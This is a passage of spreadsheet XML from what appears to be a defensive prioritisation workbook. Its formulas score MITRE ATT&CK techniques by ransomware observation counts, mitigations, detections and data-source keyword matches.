        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>99.252363539682548</v>
      </c>
      <c r="AR278" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS278" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT278" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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2.3869610366591081</v>
      </c>
    </row>
    <row r="279" spans="1:47" ht="34">
      <c r="A279" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B279" s="37">
        <f t="shared" si="4"/>
        <v>435.15709042857151</v>
      </c>
      <c r="C279" s="37" t="s">
        <v>984</v>
      </c>
      <c r="D279" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E279" s="37" t="s">
        <v>985</v>
      </c>
      <c r="F279" s="37">
        <v>1</v>
      </c>
      <c r="G279" s="37">
        <v>1</v>
      </c>
      <c r="H279" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I279" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J279" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K279" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L279" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M279" s="37">
        <v>0</v>
      </c>
      <c r="N279" s="56">
        <v>1</v>
      </c>
      <c r="O279" s="56">
        <v>32</v>
      </c>
      <c r="P279" s="56">
        <v>3</v>
      </c>
      <c r="Q279" s="56">
        <v>16</v>
      </c>
      <c r="R279" s="57">
        <v>10.5</v>
      </c>
      <c r="S279" s="57">
        <v>1</v>
      </c>
      <c r="T279" s="57" t="s">
        <v>983</v>
      </c>
      <c r="U279" s="57">
        <v>4</v>
      </c>
      <c r="V279" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29523804761904765</v>
      </c>
      <c r="W279" s="37">
        <v>5</v>
      </c>
      <c r="X279" s="37">
        <v>9.0909000000000004E-2</v>
      </c>
      <c r="Y279" s="37">
        <v>9.0909000000000004E-2</v>
      </c>
      <c r="Z279" s="37">
        <v>52</v>
      </c>
      <c r="AA279" s="37">
        <v>0.52</v>
      </c>
      <c r="AB279" s="37">
        <v>0.52</v>
      </c>
      <c r="AC279" s="37"/>
      <c r="AD279" s="50" t="s">
        <v>986</v>
      </c>
      <c r="AE279" s="37" t="str" cm="1">
        <f t="array" ref="AE279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD279)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF279" s="37">
        <v>275</v>
      </c>
      <c r="AG279" s="37" t="str" cm="1">
        <f t="array" ref="AG279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH279" s="37">
        <v>275</v>
      </c>
      <c r="AI279" s="37" t="str" cm="1">
        <f t="array" ref="AI279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD279)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ279" s="37">
        <v>275</v>
      </c>
      <c r="AK279" s="37" t="str" cm="1">
        <f t="array" ref="AK279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL279" s="37">
        <v>275</v>
      </c>
      <c r="AM279" s="37" t="str" cm="1">
        <f t="array" ref="AM279">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD279)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN279" s="37">
        <v>0</v>
      </c>
      <c r="AO279" s="37">
        <v>2</v>
      </c>
      <c r="AP279" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ279" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>145.05236347619049</v>
      </c>
      <c r="AR279" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS279" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT279" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU27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6.954874451247167</v>
      </c>
    </row>
    <row r="280" spans="1:47" ht="34">
      <c r="A280" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B280" s="37">
        <f t="shared" si="4"/>
        <v>431.47645357142864</v>
      </c>
      <c r="C280" s="37" t="s">
        <v>987</v>
      </c>
      <c r="D280" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E280" s="37" t="s">
        <v>988</v>
      </c>
      <c r="F280" s="37">
        <v>1</v>
      </c>
      <c r="G280" s="37">
        <v>1</v>
      </c>
      <c r="H280" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I280" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J280" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K280" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L280" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M280" s="37">
        <v>0</v>
      </c>
      <c r="N280" s="56">
        <v>0</v>
      </c>
      <c r="O280" s="56">
        <v>0</v>
      </c>
      <c r="P280" s="56">
        <v>0</v>
      </c>
      <c r="Q280" s="56">
        <v>1</v>
      </c>
      <c r="R280" s="57" t="s">
        <v>989</v>
      </c>
      <c r="S280" s="57">
        <v>14</v>
      </c>
      <c r="T280" s="57" t="s">
        <v>990</v>
      </c>
      <c r="U280" s="57">
        <v>16</v>
      </c>
      <c r="V280" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.29047642857142858</v>
      </c>
      <c r="W280" s="37">
        <v>30</v>
      </c>
      <c r="X280" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Y280" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Z280" s="37">
        <v>1</v>
      </c>
      <c r="AA280" s="37">
        <v>0.01</v>
      </c>
      <c r="AB280" s="37">
        <v>0.01</v>
      </c>
      <c r="AC280" s="37"/>
      <c r="AD280" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE280" s="37" t="str" cm="1">
        <f t="array" ref="AE280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD280)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF280" s="37">
        <v>276</v>
      </c>
      <c r="AG280" s="37" t="str" cm="1">
        <f t="array" ref="AG280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH280" s="37">
        <v>276</v>
      </c>
      <c r="AI280" s="37" t="str" cm="1">
        <f t="array" ref="AI280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ280" s="37">
        <v>276</v>
      </c>
      <c r="AK280" s="37" t="str" cm="1">
        <f t="array" ref="AK280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL280" s="37">
        <v>276</v>
      </c>
      <c r="AM280" s="37" t="str" cm="1">
        <f t="array" ref="AM280">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD280)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN280" s="37">
        <v>0</v>
      </c>
      <c r="AO280" s="37">
        <v>0</v>
      </c>
      <c r="AP280" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ280" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>143.82548452380954</v>
      </c>
      <c r="AR280" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS280" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT280" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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81" spans="1:47" ht="34">
      <c r="A281" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B281" s="37">
        <f t="shared" si="4"/>
        <v>126.74285714285715</v>
      </c>
      <c r="C281" s="37" t="s">
        <v>991</v>
      </c>
      <c r="D281" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E281" s="37" t="s">
        <v>992</v>
      </c>
      <c r="F281" s="37">
        <v>1</v>
      </c>
      <c r="G281" s="37">
        <v>1</v>
      </c>
      <c r="H281" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I281" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J281" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K281" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L281" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M281" s="37">
        <v>0</v>
      </c>
      <c r="N281" s="56">
        <v>0</v>
      </c>
      <c r="O281" s="56">
        <v>2</v>
      </c>
      <c r="P281" s="56">
        <v>0</v>
      </c>
      <c r="Q281" s="56">
        <v>1</v>
      </c>
      <c r="R281" s="57"/>
      <c r="S281" s="57">
        <v>0</v>
      </c>
      <c r="T281" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U281" s="57">
        <v>0</v>
      </c>
      <c r="V281" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W281" s="37">
        <v>0</v>
      </c>
      <c r="X281" s="37">
        <v>0</v>
      </c>
      <c r="Y281" s="37">
        <v>0</v>
      </c>
      <c r="Z281" s="37">
        <v>3</v>
      </c>
      <c r="AA281" s="37">
        <v>0.03</v>
      </c>
      <c r="AB281" s="37">
        <v>0.03</v>
      </c>
      <c r="AC281" s="37"/>
      <c r="AD281" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE281" s="37" t="str" cm="1">
        <f t="array" ref="AE281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD281)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF281" s="37">
        <v>277</v>
      </c>
      <c r="AG281" s="37" t="str" cm="1">
        <f t="array" ref="AG281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH281" s="37">
        <v>277</v>
      </c>
      <c r="AI281" s="37" t="str" cm="1">
        <f t="array" ref="AI281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ281" s="37">
        <v>277</v>
      </c>
      <c r="AK281" s="37" t="str" cm="1">
        <f t="array" ref="AK281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL281" s="37">
        <v>277</v>
      </c>
      <c r="AM281" s="37" t="str" cm="1">
        <f t="array" ref="AM281">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD281)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN281" s="37">
        <v>0</v>
      </c>
      <c r="AO281" s="37"/>
      <c r="AP281" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ281" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.247619047619047</v>
      </c>
      <c r="AR281" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS281" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT281" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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82" spans="1:47" ht="34">
      <c r="A282" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B282" s="37">
        <f t="shared" si="4"/>
        <v>127.20000000000002</v>
      </c>
      <c r="C282" s="37" t="s">
        <v>993</v>
      </c>
      <c r="D282" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E282" s="37" t="s">
        <v>994</v>
      </c>
      <c r="F282" s="37">
        <v>1</v>
      </c>
      <c r="G282" s="37">
        <v>1</v>
      </c>
      <c r="H282" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I282" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J282" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K282" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L282" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M282" s="37">
        <v>0</v>
      </c>
      <c r="N282" s="56">
        <v>0</v>
      </c>
      <c r="O282" s="56">
        <v>0</v>
      </c>
      <c r="P282" s="56">
        <v>0</v>
      </c>
      <c r="Q282" s="56">
        <v>3</v>
      </c>
      <c r="R282" s="57"/>
      <c r="S282" s="57">
        <v>0</v>
      </c>
      <c r="T282" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U282" s="57">
        <v>0</v>
      </c>
      <c r="V282" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W282" s="37">
        <v>0</v>
      </c>
      <c r="X282" s="37">
        <v>0</v>
      </c>
      <c r="Y282" s="37">
        <v>0</v>
      </c>
      <c r="Z282" s="37">
        <v>3</v>
      </c>
      <c r="AA282" s="37">
        <v>0.03</v>
      </c>
      <c r="AB282" s="37">
        <v>0.03</v>
      </c>
      <c r="AC282" s="37"/>
      <c r="AD282" s="50" t="s">
        <v>957</v>
      </c>
      <c r="AE282" s="37" t="str" cm="1">
        <f t="array" ref="AE282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD282)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF282" s="37">
        <v>278</v>
      </c>
      <c r="AG282" s="37" t="str" cm="1">
        <f t="array" ref="AG282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH282" s="37">
        <v>278</v>
      </c>
      <c r="AI282" s="37" t="str" cm="1">
        <f t="array" ref="AI282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD282)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ282" s="37">
        <v>278</v>
      </c>
      <c r="AK282" s="37" t="str" cm="1">
        <f t="array" ref="AK282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL282" s="37">
        <v>278</v>
      </c>
      <c r="AM282" s="37" t="str" cm="1">
        <f t="array" ref="AM282">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD282)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN282" s="37">
        <v>0</v>
      </c>
      <c r="AO282" s="37"/>
      <c r="AP282" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ282" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>42.400000000000006</v>
      </c>
      <c r="AR282" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS282" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT282" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU28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83" spans="1:47" ht="68">
      <c r="A283" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B283" s="37">
        <f t="shared" si="4"/>
        <v>1045.1159969047619</v>
      </c>
      <c r="C283" s="37" t="s">
        <v>995</v>
      </c>
      <c r="D283" s="50" t="s">
        <v>996</v>
      </c>
      <c r="E283" s="37"/>
      <c r="F283" s="37">
        <v>1</v>
      </c>
      <c r="G283" s="37">
        <v>16</v>
      </c>
      <c r="H283" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.55000000000000004</v>
      </c>
      <c r="I283" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J283" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K283" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>1.6</v>
      </c>
      <c r="L283" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>1</v>
      </c>
      <c r="M283" s="37">
        <v>4.6930000000000001E-3</v>
      </c>
      <c r="N283" s="56">
        <v>0</v>
      </c>
      <c r="O283" s="56">
        <v>28</v>
      </c>
      <c r="P283" s="56">
        <v>3</v>
      </c>
      <c r="Q283" s="56">
        <v>3</v>
      </c>
      <c r="R283" s="57" t="s">
        <v>997</v>
      </c>
      <c r="S283" s="57">
        <v>10</v>
      </c>
      <c r="T283" s="57" t="s">
        <v>998</v>
      </c>
      <c r="U283" s="57">
        <v>13</v>
      </c>
      <c r="V283" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.38095247619047623</v>
      </c>
      <c r="W283" s="37">
        <v>23</v>
      </c>
      <c r="X283" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y283" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z283" s="37">
        <v>34</v>
      </c>
      <c r="AA283" s="37">
        <v>0.34</v>
      </c>
      <c r="AB283" s="37">
        <v>0.34</v>
      </c>
      <c r="AC283" s="37"/>
      <c r="AD283" s="50" t="s">
        <v>907</v>
      </c>
      <c r="AE283" s="37" t="str" cm="1">
        <f t="array" ref="AE283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD283)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF283" s="37">
        <v>279</v>
      </c>
      <c r="AG283" s="37" t="str" cm="1">
        <f t="array" ref="AG283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD283)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH283" s="37">
        <v>279</v>
      </c>
      <c r="AI283" s="37" t="str" cm="1">
        <f t="array" ref="AI283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ283" s="37">
        <v>279</v>
      </c>
      <c r="AK283" s="37" t="str" cm="1">
        <f t="array" ref="AK283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL283" s="37">
        <v>279</v>
      </c>
      <c r="AM283" s="37" t="str" cm="1">
        <f t="array" ref="AM283">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD283)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN283" s="37">
        <v>0</v>
      </c>
      <c r="AO283" s="37">
        <v>2</v>
      </c>
      <c r="AP283" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ283" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>348.37199896825399</v>
      </c>
      <c r="AR283" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS283" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT283" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU28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16.636761855631143</v>
      </c>
    </row>
    <row r="284" spans="1:47" ht="17">
      <c r="A284" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
